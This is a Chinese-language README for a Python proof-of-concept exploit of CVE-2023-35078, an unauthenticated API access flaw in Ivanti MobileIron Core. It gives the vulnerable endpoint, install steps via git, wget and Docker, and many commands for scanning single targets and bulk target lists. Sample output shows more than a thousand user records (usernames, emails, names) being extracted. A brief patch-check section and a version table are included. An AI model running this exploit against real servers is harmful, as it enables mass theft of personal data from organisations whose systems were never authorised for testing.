██████╗ ███╗ ██╗███████╗███████╗ ██████╗
██╔═████╗████╗ ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗ ██║
████╔╝██║██║╚██╗██║╚════██║██╔══╝ ██║
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
╚═════╝ ╚═╝ ╚═══╝╚══════╝╚══════╝ ╚═════╝
[+] CVE-2023-35078 - Ivanti MobileIron Core 远程未认证 API 访问
一个基于 Python 的概念验证漏洞利用工具,针对 CVE-2023-35078,即 Ivanti MobileIron Core 系统中的远程未认证 API 访问漏洞。
CVE-2023-35078 是一个影响 Ivanti MobileIron Core 的严重漏洞,允许远程未认证攻击者在无需任何身份验证的情况下访问敏感 API 端点并提取用户数据。
该漏洞存在于 MobileIron Core 的 API 身份验证机制中,具体位于 /mifs/aad/api/v2/authorized/users 端点。该端点未能正确验证身份验证令牌,从而允许未经授权访问敏感用户信息,包括:
# 克隆仓库
git clone https://github.com/0nsec/cve-2023-35078-exploit.git
cd cve-2023-35078-exploit
# 安装依赖
pip3 install -r requirements.txt
# 赋予可执行权限(Linux/macOS)
chmod +x cve_2023_35078.py
# 创建项目目录
mkdir cve-2023-35078-exploit
cd cve-2023-35078-exploit
# 下载脚本
wget https://raw.githubusercontent.com/0nsec/cve-2023-35078-exploit/main/cve_2023_35078.py
# 安装所需包
pip3 install requests urllib3 termcolor argparse
FROM python:3.9-slim
WORKDIR /app
COPY requirements.txt .
RUN pip install -r requirements.txt
COPY cve_2023_35078.py .
ENTRYPOINT ["python3", "cve_2023_35078.py"]
# 使用 Docker 构建并运行
docker build -t cve-2023-35078 .
docker run -v $(pwd)/results:/app/results cve-2023-35078 -u https://target.com
# 测试单个目标
python3 cve_2023_35078.py -u https://mobileiron.example.com
# 从文件测试多个目标
python3 cve_2023_35078.py -f targets.txt
# 详细模式,自定义输出目录
python3 cve_2023_35078.py -f targets.txt -o ./results -v
# 自定义超时和输出设置
python3 cve_2023_35078.py -u https://target.com -t 30 -o ./scan_results -v
# 全面的企业评估
python3 cve_2023_35078.py -f corporate_assets.txt -o ./audit_results -t 30 -v
# 单个目标详细日志记录
python3 cve_2023_35078.py -u https://mobileiron.target.com -v > detailed_log.txt
# 批量扫描,自定义超时
python3 cve_2023_35078.py -f subnet_scan.txt -t 5 -o ./batch_results
# 快速漏洞检查(无详细输出)
python3 cve_2023_35078.py -u https://quick.check.com -t 5
██████╗ ███╗ ██╗███████╗███████╗ ██████╗
██╔═████╗████╗ ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗ ██║
████╔╝██║██║╚██╗██║╚════██║██╔══╝ ██║
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
╚═════╝ ╚═╝ ╚═══╝╚══════╝╚══════╝ ╚═════╝
[*] 目标: https://vulnerable.mobileiron.com
------------------------------------------------------------
[*] 检查版本: https://vulnerable.mobileiron.com
[*] 检测到版本:11.3
[+] 目标似乎存在漏洞!
[*] 尝试利用:https://vulnerable.mobileiron.com
[*] 尝试端点:/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[+] 成功!发现 1,247 个用户
[+] 结果已保存至:./results/vulnerable_mobileiron_com_20250821_055013.json
[+] 提取了 1247 条用户记录
[*] 示例字段:['id', 'username', 'email', 'firstName', 'lastName']...
============================================================
[*] 扫描完成!
[*] 已处理目标数:1
[*] 成功利用数:1
[!] 警告:发现 1 个易受攻击的系统!
[!] 测试前请确保已获得适当授权!
[*] 检查版本: https://test.mobileiron.com
[*] 尝试端点:/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[*] HTTP 200 - 响应长度:45,123 字节
[*] JSON 解析成功
[*] 发现包含 234 条记录的用户数据结构
[+] 成功!发现 234 个用户
[*] 示例用户数据:{'id': '12345', 'username': '[email protected]'}
[+] 结果已保存至:./results/test_mobileiron_com_20250821_055013.json
# 检查当前版本
curl -k https://mobileiron-server/mifs/css/ui.login.css | grep -o "11\.[0-9]"
# 验证已修补的端点返回 401/403
curl -k "https://mobileiron-server/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1"
| 版本 | 存在漏洞 | 补丁可用 | 补丁级别 | 发布日期 |
|---|
| 11.2.x | 是 | 可用 | CU21+ | 2023-07-25 |
| 11.3.x | 是 | 可用 | CU18+ | 2023-07-25 |
| 11.4.x | 是 | 可用 | CU8+ | 2023-07-25 |
| 11.5.x+ | 否 | 不适用 | 不适用 | 不适用 |